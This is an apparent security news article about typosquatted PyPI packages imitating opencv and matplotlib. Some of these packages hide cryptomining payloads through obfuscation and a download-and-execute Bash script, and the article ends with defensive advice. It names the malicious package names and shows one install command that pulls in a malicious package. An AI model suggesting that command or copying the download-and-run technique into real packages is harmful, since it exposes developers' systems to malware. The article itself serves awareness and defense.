Beware of Malicious PyPI Packages: How Typos Turn Into Crypto‑Mining Malware

Malicious PyPI Packages

Installing Python software via PyPI is convenient, but a simple typo can pull a malicious package. For example, running pip install openvc installs the malicious openvc package instead of the intended opencv.

Security firm Sonatype reports that many malicious packages masquerade as popular PyPI libraries, differing by only a few characters, and often embed cryptomining code.

Mining Software Disguised as Popular Libraries

Common plotting library matplotlib has several look‑alike malicious packages such as mplatlib , maratlib , and others uploaded by the user nedog123 . In total, seven impostor packages have been identified.

These packages depend on each other; for instance, learninglib depends on maratlib. Some hide dependencies, e.g., mplatlib disguises its dependency as “LKEK”.

Deep Obfuscation and Cryptomining Payloads

Analysis of maratlib 1.0 shows heavy obfuscation, making it hard to see the hidden code. Version 0.6 reveals that it downloads and executes a Bash script from GitHub, which in turn fetches the cryptominer “Ubqminer” and includes the attacker’s wallet address.

PyPI has removed these packages, but they have already been downloaded more than 5,000 times.

Why PyPI Supply‑Chain Risks Matter

These incidents are only the tip of the iceberg. Earlier attacks in 2016 used similar naming tricks, affecting 1.7 k developers and running 45 k times, even compromising U.S. military systems.

To mitigate risk, monitor the behavior of setup.py, install suspicious packages inside isolated containers, and capture system calls and network traffic. The same caution applies to other package managers such as npm and gem.

References: Sonatype blog, Ars Technica, Freebuf, GitHub repository.